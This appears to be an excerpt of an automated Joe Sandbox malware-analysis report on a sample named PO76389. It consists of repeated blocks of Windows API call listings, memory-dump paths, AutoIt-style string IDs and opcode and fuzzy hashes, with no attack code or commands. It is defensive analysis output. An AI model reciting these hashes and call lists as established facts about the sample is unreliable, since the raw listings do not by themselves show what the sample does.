                                                    • GetWindowLongW.USER32(?,000000F0), ref: 00517605
                                                    • DestroyWindow.USER32(?), ref: 00517631
                                                    • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,00000003,80000000,80000000,80000000,80000000,00000000,00000000,00000000,00000000), ref: 0051765A
                                                    • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 00517678
                                                    • SendMessageW.USER32(?,00000439,00000000,00000030), ref: 0051769E
                                                    • SendMessageW.USER32(?,00000421,?,?), ref: 005176B3
                                                    • SendMessageW.USER32(?,0000041D,00000000,00000000), ref: 005176C6
                                                    • IsWindowVisible.USER32(?), ref: 005176E6
                                                    • SendMessageW.USER32(?,00000412,00000000,D8F0D8F0), ref: 00517701
                                                    • SendMessageW.USER32(?,00000411,00000001,00000030), ref: 00517715
                                                    • GetWindowRect.USER32(?,?), ref: 0051772D
                                                    • MonitorFromPoint.USER32(?,?,00000002), ref: 00517753
                                                    • GetMonitorInfoW.USER32 ref: 0051776D
                                                    • CopyRect.USER32(?,?), ref: 00517784
                                                    • SendMessageW.USER32(?,00000412,00000000), ref: 005177EF
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2096479232.00000000004B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004B0000, based on PE: true
                                                    • Associated: 00000000.00000002.2096465302.00000000004B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.000000000055E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.000000000056A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.000000000057A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.00000000005E5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096634093.00000000005EB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096647771.00000000005EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_4b0000_PO76389.jbxd
                                                    Similarity
                                                    • API ID: MessageSendWindow$Rect$Monitor$CopyCreateCursorDesktopDestroyFromInfoLongPointVisible
                                                    • String ID: ($0$tooltips_class32
                                                    • API String ID: 698492251-4156429822
                                                    • Opcode ID: c22ebbf27ec0c4eb91c64759a1a62c254f2383eb9476bce09faef6103f9a44f2
                                                    • Instruction ID: c220941e82fe2b87ee4085a4c1d4d851dd99f271af5076f5ee346bb6a48dbc58
                                                    • Opcode Fuzzy Hash: c22ebbf27ec0c4eb91c64759a1a62c254f2383eb9476bce09faef6103f9a44f2
                                                    • Instruction Fuzzy Hash: F7B19E71608300AFEB04DF68C985BAABBF5FF88314F00891DF5999B291D774E844CBA5
                                                    APIs
                                                    • SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 004CA839
                                                    • GetSystemMetrics.USER32(00000007), ref: 004CA841
                                                    • SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 004CA86C
                                                    • GetSystemMetrics.USER32(00000008), ref: 004CA874
                                                    • GetSystemMetrics.USER32(00000004), ref: 004CA899
                                                    • SetRect.USER32(000000FF,00000000,00000000,000000FF,000000FF), ref: 004CA8B6
                                                    • AdjustWindowRectEx.USER32(000000FF,00000000,00000000,00000000), ref: 004CA8C6
                                                    • CreateWindowExW.USER32(00000000,AutoIt v3 GUI,?,00000000,?,000000FF,000000FF,000000FF,?,00000000,00000000), ref: 004CA8F9
                                                    • SetWindowLongW.USER32(00000000,000000EB,00000000), ref: 004CA90D
                                                    • GetClientRect.USER32(00000000,000000FF), ref: 004CA92B
                                                    • GetStockObject.GDI32(00000011), ref: 004CA947
                                                    • SendMessageW.USER32(00000000,00000030,00000000), ref: 004CA952
                                                      • Part of subcall function 004CB736: GetCursorPos.USER32(000000FF), ref: 004CB749
                                                      • Part of subcall function 004CB736: ScreenToClient.USER32(00000000,000000FF), ref: 004CB766
                                                      • Part of subcall function 004CB736: GetAsyncKeyState.USER32(00000001), ref: 004CB78B
                                                      • Part of subcall function 004CB736: GetAsyncKeyState.USER32(00000002), ref: 004CB799
                                                    • SetTimer.USER32(00000000,00000000,00000028,004CACEE), ref: 004CA979
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2096479232.00000000004B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004B0000, based on PE: true
                                                    • Associated: 00000000.00000002.2096465302.00000000004B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.000000000055E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.000000000056A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.000000000057A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.00000000005E5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096634093.00000000005EB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096647771.00000000005EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_4b0000_PO76389.jbxd
                                                    Similarity
                                                    • API ID: System$MetricsRectWindow$AsyncClientInfoParametersState$AdjustCreateCursorLongMessageObjectScreenSendStockTimer
                                                    • String ID: AutoIt v3 GUI
                                                    • API String ID: 1458621304-248962490
                                                    • Opcode ID: bfe3eab459bb48f61b7b19e90c66f27d0453ce033c8aca0c19b0def5deafaeed
                                                    • Instruction ID: e47952e4cd301c4a974cfa1798eb7d0e4807169dcfac575dd9304b0ea2b86405
                                                    • Opcode Fuzzy Hash: bfe3eab459bb48f61b7b19e90c66f27d0453ce033c8aca0c19b0def5deafaeed
                                                    • Instruction Fuzzy Hash: 7BB18F7560020AAFDB14DFA8EC46FAE7BB4FF18318F10422AFA15A7290D734D851DB55
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2096479232.00000000004B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004B0000, based on PE: true
                                                    • Associated: 00000000.00000002.2096465302.00000000004B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.000000000055E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.000000000056A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.000000000057A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.00000000005E5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096634093.00000000005EB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096647771.00000000005EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_4b0000_PO76389.jbxd
                                                    Similarity
                                                    • API ID: _wcscat$D31560_wcscmp_wcscpy_wcsncpy_wcsstr
                                                    • String ID: %u.%u.%u.%u$04090000$DefaultLangCodepage$StringFileInfo\$\VarFileInfo\Translation
                                                    • API String ID: 390803403-1459072770
                                                    • Opcode ID: 757b26b0f3c744d6867fe399b9ab5fb5474fec83e8a62fa42fecc15e59e83b17
                                                    • Instruction ID: a2ab51df16d3e03b6744706ef45819f623d03e974bcb0b0292c5c7290f302ba0
                                                    • Opcode Fuzzy Hash: 757b26b0f3c744d6867fe399b9ab5fb5474fec83e8a62fa42fecc15e59e83b17
                                                    • Instruction Fuzzy Hash: 35411771904204BAD701B7659C97EBF7BFCEF55754F00005BF900A3292EB6CAA01D6B9
                                                    APIs
                                                    • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00513626
                                                    • RegCreateKeyExW.ADVAPI32(?,?,00000000,0054DBF0,00000000,?,00000000,?,?), ref: 00513694
                                                    • RegCloseKey.ADVAPI32(00000000,00000001,00000000,00000000,00000000), ref: 005136DC
                                                    • RegSetValueExW.ADVAPI32(00000001,?,00000000,00000002,?), ref: 00513765
                                                    • RegCloseKey.ADVAPI32(?), ref: 00513A85
                                                    • RegCloseKey.ADVAPI32(00000000), ref: 00513A92
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2096479232.00000000004B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004B0000, based on PE: true
                                                    • Associated: 00000000.00000002.2096465302.00000000004B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.000000000055E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.000000000056A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.000000000057A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.00000000005E5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096634093.00000000005EB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096647771.00000000005EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_4b0000_PO76389.jbxd
                                                    Similarity
                                                    • API ID: Close$ConnectCreateRegistryValue
                                                    • String ID: REG_BINARY$REG_DWORD$REG_EXPAND_SZ$REG_MULTI_SZ$REG_QWORD$REG_SZ
                                                    • API String ID: 536824911-966354055
                                                    • Opcode ID: b62caa7d56065eaeee16a46f9dd4a9d3f514a034058775dc07c2d1d7142523fc
                                                    • Instruction ID: 3d6435405a48c12322428853e86fc6e7ec22dfb2df5004df2cad53beb3a0abca
                                                    • Opcode Fuzzy Hash: b62caa7d56065eaeee16a46f9dd4a9d3f514a034058775dc07c2d1d7142523fc
                                                    • Instruction Fuzzy Hash: C2029C75200601AFDB04EF25C891E6ABBE5FF88724F04845EF88A9B361EB34ED41CB55
                                                    APIs
                                                    • CharUpperBuffW.USER32(?,?), ref: 00516A52
                                                    • SendMessageW.USER32(?,00001032,00000000,00000000), ref: 00516B12
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2096479232.00000000004B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004B0000, based on PE: true
                                                    • Associated: 00000000.00000002.2096465302.00000000004B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.000000000055E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.000000000056A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.000000000057A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.00000000005E5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096634093.00000000005EB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096647771.00000000005EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_4b0000_PO76389.jbxd
                                                    Similarity
                                                    • API ID: BuffCharMessageSendUpper
                                                    • String ID: DESELECT$FINDITEM$GETITEMCOUNT$GETSELECTED$GETSELECTEDCOUNT$GETSUBITEMCOUNT$GETTEXT$ISSELECTED$SELECT$SELECTALL$SELECTCLEAR$SELECTINVERT$VIEWCHANGE
                                                    • API String ID: 3974292440-719923060
                                                    • Opcode ID: a11f85f8a265ae12dda3ecbe3d783ae639cc0ab332f664f93f7aed23da5b3674
                                                    • Instruction ID: 6a32fb65732eb4c13778cbe720fe192dc1f7fc277360117ad11d0bcceb9b8dbd
                                                    • Opcode Fuzzy Hash: a11f85f8a265ae12dda3ecbe3d783ae639cc0ab332f664f93f7aed23da5b3674
                                                    • Instruction Fuzzy Hash: 3AA193342042019BDB04EF15C991FAABBE6FF44358F14486EB8969B3D2DB38EC49CB55
                                                    APIs
                                                    • GetClassNameW.USER32(?,?,00000100), ref: 004EDD87
                                                    • __swprintf.LIBCMT ref: 004EDE28
                                                    • _wcscmp.LIBCMT ref: 004EDE3B
                                                    • SendMessageTimeoutW.USER32(?,?,00000101,00000000,00000002,00001388,?), ref: 004EDE90
                                                    • _wcscmp.LIBCMT ref: 004EDECC
                                                    • GetClassNameW.USER32(?,?,00000400), ref: 004EDF03
                                                    • GetDlgCtrlID.USER32(?), ref: 004EDF55
                                                    • GetWindowRect.USER32(?,?), ref: 004EDF8B
                                                    • GetParent.USER32(?), ref: 004EDFA9
                                                    • ScreenToClient.USER32(00000000), ref: 004EDFB0
                                                    • GetClassNameW.USER32(?,?,00000100), ref: 004EE02A
                                                    • _wcscmp.LIBCMT ref: 004EE03E
                                                    • GetWindowTextW.USER32(?,?,00000400), ref: 004EE064
                                                    • _wcscmp.LIBCMT ref: 004EE078
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2096479232.00000000004B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004B0000, based on PE: true
                                                    • Associated: 00000000.00000002.2096465302.00000000004B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.000000000055E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.000000000056A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.000000000057A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.00000000005E5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096634093.00000000005EB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096647771.00000000005EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_4b0000_PO76389.jbxd
                                                    Similarity
                                                    • API ID: _wcscmp$ClassName$Window$ClientCtrlMessageParentRectScreenSendTextTimeout__swprintf
                                                    • String ID: %s%u
                                                    • API String ID: 3119225716-679674701
                                                    • Opcode ID: 971db612654a982d8742c08951424e29a115583d0b57405439c0bac37bb172b4
                                                    • Instruction ID: 6a7c07c58302f1f5d560d03e1cf8e97c92bc361e960856099742ed84b1f8e981
                                                    • Opcode Fuzzy Hash: 971db612654a982d8742c08951424e29a115583d0b57405439c0bac37bb172b4
                                                    • Instruction Fuzzy Hash: 8BA10131604746ABD714DF26C884FABB7A8FF54315F00852BF9A9C3290DB78E905CBA5
                                                    APIs
                                                    • GetClassNameW.USER32(00000008,?,00000400), ref: 004EE6E1
                                                    • _wcscmp.LIBCMT ref: 004EE6F2
                                                    • GetWindowTextW.USER32(00000001,?,00000400), ref: 004EE71A
                                                    • CharUpperBuffW.USER32(?,00000000), ref: 004EE737
                                                    • _wcscmp.LIBCMT ref: 004EE755
                                                    • _wcsstr.LIBCMT ref: 004EE766
                                                    • GetClassNameW.USER32(00000018,?,00000400), ref: 004EE79E
                                                    • _wcscmp.LIBCMT ref: 004EE7AE
                                                    • GetWindowTextW.USER32(00000002,?,00000400), ref: 004EE7D5
                                                    • GetClassNameW.USER32(00000018,?,00000400), ref: 004EE81E
                                                    • _wcscmp.LIBCMT ref: 004EE82E
                                                    • GetClassNameW.USER32(00000010,?,00000400), ref: 004EE856
                                                    • GetWindowRect.USER32(00000004,?), ref: 004EE8BF
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2096479232.00000000004B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004B0000, based on PE: true
                                                    • Associated: 00000000.00000002.2096465302.00000000004B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.000000000055E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.000000000056A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.000000000057A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.00000000005E5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096634093.00000000005EB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096647771.00000000005EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_4b0000_PO76389.jbxd
                                                    Similarity
                                                    • API ID: ClassName_wcscmp$Window$Text$BuffCharRectUpper_wcsstr
                                                    • String ID: @$ThumbnailClass
                                                    • API String ID: 1788623398-1539354611
                                                    • Opcode ID: 5e9d52b02c7ebb8c97243a7bd226c4f28d3a7a9bf126447bfcca343ac6100202
                                                    • Instruction ID: 900a516a1f8edef4e22566393462418eec093717c7f192456dc3264aeac190ef
                                                    • Opcode Fuzzy Hash: 5e9d52b02c7ebb8c97243a7bd226c4f28d3a7a9bf126447bfcca343ac6100202
                                                    • Instruction Fuzzy Hash: 2981BE710042859BDB01DF13D881BAB7BE8FF54315F04846BFD899A292DB38DD46CBA9
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2096479232.00000000004B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004B0000, based on PE: true
                                                    • Associated: 00000000.00000002.2096465302.00000000004B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.000000000055E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.000000000056A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.000000000057A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.00000000005E5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096634093.00000000005EB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096647771.00000000005EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_4b0000_PO76389.jbxd
                                                    Similarity
                                                    • API ID: __wcsnicmp
                                                    • String ID: ACTIVE$ALL$CLASSNAME=$HANDLE=$LAST$REGEXP=$[ACTIVE$[ALL$[CLASS:$[HANDLE:$[LAST$[REGEXPTITLE:
                                                    • API String ID: 1038674560-1810252412
                                                    • Opcode ID: 67b1901b11dffb9b1d5520116ba584d9655aa4d2c484f4ff767a9ef6da2f966c
                                                    • Instruction ID: 2f2150b00d76be13bc782b86bbf785f7dd713d30bc1e4c6f79d33e1104f43d16
                                                    • Opcode Fuzzy Hash: 67b1901b11dffb9b1d5520116ba584d9655aa4d2c484f4ff767a9ef6da2f966c
                                                    • Instruction Fuzzy Hash: 2131C331944645B5EB14EB63CD53EEE77A46F20709F20002BF441721E5FF596F04C66A
                                                    APIs
                                                    • LoadIconW.USER32(00000063), ref: 004EF8AB
                                                    • SendMessageW.USER32(?,00000080,00000000,00000000), ref: 004EF8BD
                                                    • SetWindowTextW.USER32(?,?), ref: 004EF8D4
                                                    • GetDlgItem.USER32(?,000003EA), ref: 004EF8E9
                                                    • SetWindowTextW.USER32(00000000,?), ref: 004EF8EF
                                                    • GetDlgItem.USER32(?,000003E9), ref: 004EF8FF
                                                    • SetWindowTextW.USER32(00000000,?), ref: 004EF905
                                                    • SendDlgItemMessageW.USER32(?,000003E9,000000CC,?,00000000), ref: 004EF926
                                                    • SendDlgItemMessageW.USER32(?,000003E9,000000C5,00000000,00000000), ref: 004EF940
                                                    • GetWindowRect.USER32(?,?), ref: 004EF949
                                                    • SetWindowTextW.USER32(?,?), ref: 004EF9B4
                                                    • GetDesktopWindow.USER32 ref: 004EF9BA
                                                    • GetWindowRect.USER32(00000000), ref: 004EF9C1
                                                    • MoveWindow.USER32(?,?,?,?,00000000,00000000), ref: 004EFA0D
                                                    • GetClientRect.USER32(?,?), ref: 004EFA1A
                                                    • PostMessageW.USER32(?,00000005,00000000,00000000), ref: 004EFA3F
                                                    • SetTimer.USER32(?,0000040A,00000000,00000000), ref: 004EFA6A
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2096479232.00000000004B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004B0000, based on PE: true
                                                    • Associated: 00000000.00000002.2096465302.00000000004B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.000000000055E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.000000000056A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.000000000057A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.00000000005E5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096634093.00000000005EB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096647771.00000000005EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_4b0000_PO76389.jbxd
                                                    Similarity
                                                    • API ID: Window$ItemMessageText$RectSend$ClientDesktopIconLoadMovePostTimer
                                                    • String ID:
                                                    • API String ID: 3869813825-0
                                                    • Opcode ID: 8c4a9b495742af4a661ce4dac3f9bc99700c57c67e6d06410e631a75a3f0c251
                                                    • Instruction ID: 2ef33349f52befd88abf5c4e5bc483b5689367e33f5d5a7f710d20b00a32c9ca
                                                    • Opcode Fuzzy Hash: 8c4a9b495742af4a661ce4dac3f9bc99700c57c67e6d06410e631a75a3f0c251
                                                    • Instruction Fuzzy Hash: 3B518D70900709AFDB209FA9DD8AF6FBBF5FF04705F004529E596A26A1C774A848DB14
                                                    APIs
                                                    • _memset.LIBCMT ref: 0051CD0B
                                                    • DestroyWindow.USER32(?,?), ref: 0051CD83
                                                      • Part of subcall function 004B7E53: _memmove.LIBCMT ref: 004B7EB9
                                                    • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00000000,?), ref: 0051CE04
                                                    • SendMessageW.USER32(00000000,00000433,00000000,00000030), ref: 0051CE26
                                                    • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 0051CE35
                                                    • DestroyWindow.USER32(?), ref: 0051CE52
                                                    • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,004B0000,00000000), ref: 0051CE85
                                                    • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 0051CEA4
                                                    • GetDesktopWindow.USER32 ref: 0051CEB9
                                                    • GetWindowRect.USER32(00000000), ref: 0051CEC0
                                                    • SendMessageW.USER32(00000000,00000418,00000000,?), ref: 0051CED2
                                                    • SendMessageW.USER32(00000000,00000421,?,00000000), ref: 0051CEEA
                                                      • Part of subcall function 004CB155: GetWindowLongW.USER32(?,000000EB), ref: 004CB166
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2096479232.00000000004B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004B0000, based on PE: true
                                                    • Associated: 00000000.00000002.2096465302.00000000004B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.000000000055E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.000000000056A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.000000000057A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.00000000005E5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096634093.00000000005EB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096647771.00000000005EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_4b0000_PO76389.jbxd
                                                    Similarity
                                                    • API ID: Window$MessageSend$CreateDestroy$DesktopLongRect_memmove_memset
                                                    • String ID: 0$tooltips_class32
                                                    • API String ID: 1297703922-3619404913
                                                    • Opcode ID: 1627594fe19c0eb3a5e1ea7d1e14433af14d521b9915d95d51b710c1f2992382
                                                    • Instruction ID: 7f592787463e32f6c172cb2a272490df270afd53b3243004cbcc1fb5d4d30f39
                                                    • Opcode Fuzzy Hash: 1627594fe19c0eb3a5e1ea7d1e14433af14d521b9915d95d51b710c1f2992382
                                                    • Instruction Fuzzy Hash: 0771AB71180205AFE721CF68DC45FA63FE9FB89704F08051DF985972A1CB75E845DB26
                                                    APIs
                                                    • VariantInit.OLEAUT32(00000000), ref: 004FB46D
                                                    • VariantCopy.OLEAUT32(?,?), ref: 004FB476
                                                    • VariantClear.OLEAUT32(?), ref: 004FB482
                                                    • VariantTimeToSystemTime.OLEAUT32(?,?,?), ref: 004FB561
                                                    • __swprintf.LIBCMT ref: 004FB591
                                                    • VarR8FromDec.OLEAUT32(?,?), ref: 004FB5BD
                                                    • VariantInit.OLEAUT32(?), ref: 004FB63F
                                                    • SysFreeString.OLEAUT32(00000016), ref: 004FB6D1
                                                    • VariantClear.OLEAUT32(?), ref: 004FB727
                                                    • VariantClear.OLEAUT32(?), ref: 004FB736
                                                    • VariantInit.OLEAUT32(00000000), ref: 004FB772
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2096479232.00000000004B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004B0000, based on PE: true
                                                    • Associated: 00000000.00000002.2096465302.00000000004B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.000000000055E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.000000000056A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.000000000057A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.00000000005E5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096634093.00000000005EB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096647771.00000000005EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_4b0000_PO76389.jbxd
                                                    Similarity
                                                    • API ID: Variant$ClearInit$Time$CopyFreeFromStringSystem__swprintf
                                                    • String ID: %4d%02d%02d%02d%02d%02d$Default
                                                    • API String ID: 3730832054-3931177956
                                                    • Opcode ID: 022117c6a8ded78531fc14b6632b939ebacdcef2e8a7870302889b1bdefec96e
                                                    • Instruction ID: c2a6363094e372987432f9d2cad9a1d7169c63f8b0ded09af73e1ee64867e44a
                                                    • Opcode Fuzzy Hash: 022117c6a8ded78531fc14b6632b939ebacdcef2e8a7870302889b1bdefec96e
                                                    • Instruction Fuzzy Hash: F6C10331A00219EBCB10DF66D484B7AB7B4FF06300F14846BE6059B641DB78DC55DBEA
                                                    APIs
                                                    • CharUpperBuffW.USER32(?,?), ref: 00516FF9
                                                    • SendMessageW.USER32(?,00001105,00000000,00000000), ref: 00517044
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2096479232.00000000004B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004B0000, based on PE: true
                                                    • Associated: 00000000.00000002.2096465302.00000000004B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.000000000055E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.000000000056A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.000000000057A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.00000000005E5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096634093.00000000005EB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096647771.00000000005EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_4b0000_PO76389.jbxd
                                                    Similarity
                                                    • API ID: BuffCharMessageSendUpper
                                                    • String ID: CHECK$COLLAPSE$EXISTS$EXPAND$GETITEMCOUNT$GETSELECTED$GETTEXT$GETTOTALCOUNT$ISCHECKED$SELECT$UNCHECK
                                                    • API String ID: 3974292440-4258414348
                                                    • Opcode ID: ead8520672bdc917a0623f746267e68ebda745152b8c5c5f84090d142708cb8d
                                                    • Instruction ID: 78e9fc93a9dd5e40a0459df48b3a95564df67053375a8e22ab57b5e7f6e5ba7e
                                                    • Opcode Fuzzy Hash: ead8520672bdc917a0623f746267e68ebda745152b8c5c5f84090d142708cb8d
                                                    • Instruction Fuzzy Hash: 4091A4342047019FDB04EF15C851BAABBE2BF88358F04485EF8965B392DB39ED4ACB55
                                                    APIs
